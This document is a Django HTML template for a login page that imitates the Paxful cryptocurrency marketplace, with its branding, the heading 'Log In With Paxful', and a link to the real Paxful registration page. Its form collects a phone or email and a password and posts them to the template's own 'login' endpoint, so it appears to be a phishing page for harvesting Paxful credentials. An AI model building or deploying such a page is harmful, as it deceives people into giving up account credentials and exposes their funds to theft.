{%load static%}

<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="{% static 'https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap'%}" rel="stylesheet">

    <link rel="stylesheet" href="{% static 'fonts/icomoon/style.css' %}">

    <link rel="stylesheet" href="{% static 'css/owl.carousel.min.css' %}">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="{% static 'css/bootstrap.min.css' %}">
    
    <!-- Style -->
    <link rel="stylesheet" href="{% static 'css/style.css' %}">

    <title>Login</title>
    <link rel="icon" type="image/x-icon" href="images/favicon-16x16.png">
    <link rel="apple-touch-icon" sizes="180x180" href="images/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="images/favicon-16x16.png">
    <link rel="manifest" href="images/site.webmanifest">
  </head>
  <body>
  

  <div class="d-lg-flex half">

    <div class="bg order-1 order-md-2" style="background-image: url({% static 'images/main.png' %});">

    </div>

    <div class="contents order-2 order-md-1">

      <div class="container">

        <div class="row align-items-center justify-content-center">
          <div class="col-md-7">

            <div class="d-flex align-items-start justify-content-between">  

              <img src = "{% static 'images/pax4.png' %}" style="padding-top: 5;"> <img src = "{% static 'images/lang.png' %} "style="w" >

            </div>
            <div class="mb-4">

              <!--

                 <div class="col-6">

                <img src = "images/pax4.png" style="padding-top: 5;"> <img src = "images/lang.png "style="w" > 


              </div>


             <div class="myimage">



              -->
             
                




              





              <!--<h3>Log In With Paxful</h3>-->

              <h1 class="h2 qa-login-page-title mb-3 mb-lg-4">Log In With Paxful</h1>

              <div class="d-flex flex-column flex-xs-row"><img src="{% static 'images/white.png' %}" class="mt-2 ml-xs-3 align-self-start LoginTemplate__labelIcon" alt="url">

              <img src = "{% static 'images/alert2.png' %}">

              </div>

              <!--<p class="mb-4">Lorem ipsum dolor sit amet elit. Sapiente sit aut eos consectetur adipisicing.</p>-->
            </div>
            <form action="{% url 'login' %}" method="post">

              {% csrf_token %}




              <div class="mb-3"><label for="username" class="label-small font-weight-semibold">Your Phone or Email</label><div><div><div class="d-flex align-items-center justify-content-between form-control">
                <input name="username" type="text" class="min-width-0 border-transparent py-0 form-control" value=""></div></div><div class="position-relative cursor-pointer"></div></div></div>



<!--
              <label for="username" class="label-small font-weight-semibold" style="color:#333">Your Phone or Email </label>

              <div class="form-group first">
                <label for="username"></label>
                <input type="text" class="form-control" id="username">

              </div>


              <div class="d-flex align-items-start justify-content-between"><label for="password" class="label-small font-weight-semibold" style="color:#333">Your Password</label><a class="regular-20 lh-16" tabindex="-1" >Forgot password?</a></div>

                -->


              <!--<h6>Your Password<span class="ml-auto"><a href="#" class="forgot-pass">Forgot Password</a></span> 
              </h6>
              <-->

              <!--
              <div class="form-group last mb-3">
                <label for="password"></label>
                <input type="password" class="form-control" id="password">
                
              </div>
              -->
              

              <div class="inputPass">
              <div class="mb-4"><div class="d-flex align-items-start justify-content-between"><label for="password" class="label-small font-weight-semibold">Your Password</label><a class="regular-20 lh-16"  href="">Forgot password?</a></div><div><div class="d-flex align-items-center justify-content-between form-control mb-2 "><input name="password" id="password" autocomplete="current-password"  type="password" class="min-width-0 border-transparent py-0 form-control style=background-color:black" value=""><button type="button" class="smallBtn"><svg width="16" height="16" viewBox="0 0 16 16" color="black" class="d-block"><path fill-rule="evenodd" d="M2.03 8.006L2.027 8l.003-.006a2.35 2.35 0 01.287-.41c.288-.344.73-.753 1.3-1.145C4.762 5.65 6.318 5 8 5c1.68 0 3.235.656 4.381 1.448a6.704 6.704 0 011.303 1.148c.142.17.234.307.285.404a2.465 2.465 0 01-.285.404 6.704 6.704 0 01-1.303 1.148C11.235 10.344 9.68 11 8 11c-1.682 0-3.238-.65-4.383-1.439-.57-.392-1.012-.8-1.3-1.144a2.397 2.397 0 01-.287-.41zM8 3c-2.184 0-4.128.836-5.517 1.79-.696.48-1.279 1.007-1.7 1.51a4.29 4.29 0 00-.528.772C.128 7.317 0 7.642 0 8c0 .358.128.683.255.928.135.26.318.522.528.772.421.503 1.004 1.03 1.7 1.51C3.872 12.163 5.816 13 8 13c2.186 0 4.131-.844 5.518-1.802.696-.48 1.278-1.008 1.698-1.508.21-.25.392-.508.527-.766.126-.24.257-.565.257-.924 0-.359-.13-.684-.257-.924a4.385 4.385 0 00-.527-.766c-.42-.5-1.002-1.027-1.698-1.508C12.131 3.844 10.186 3 8 3zm0 7a2 2 0 100-4 2 2 0 000 4z" clip-rule="evenodd"></path></svg></button></div></div></div>
              
            </div>
              <button type="submit" value="LogIn" class="py-3 d-flex justify-content-between btn btn-primary btn-lg btn-block"><span>Log in</span><svg width="16" height="16" viewBox="0 0 16 16" fill="currentColor" class="reflect-element"><path fill-rule="evenodd" d="M4.294 13.292l5.292-5.293-5.292-5.293a1 1 0 111.414-1.414l6 6a.99.99 0 01.277.53L12 7.94v.118a.996.996 0 01-.291.648l-6 6a1 1 0 11-1.414-1.414z" clip-rule="evenodd"></path></svg></button>

              <!--<input type="submit" value="Log In" class="btn btn-block btn-primary">-->






              <hr class="mt-4">


              <span class="d-flex regular-24">New on Paxful?<a href="https://paxful.com/register?locale=en" class="ml-2">Create an Account</a></span>

              
              
            </form>
          </div>
        </div>
      </div>
    </div>

    
  </div>
    
    

    <script src="{% static 'js/jquery-3.3.1.min.js' %}"></script>
    <script src="{% static 'js/popper.min.js' %}"></script>
    <script src="{% static 'js/bootstrap.min.js' %}"></script>
    <script src="{% static 'js/main.js' %}"></script>
  </body>
</html>











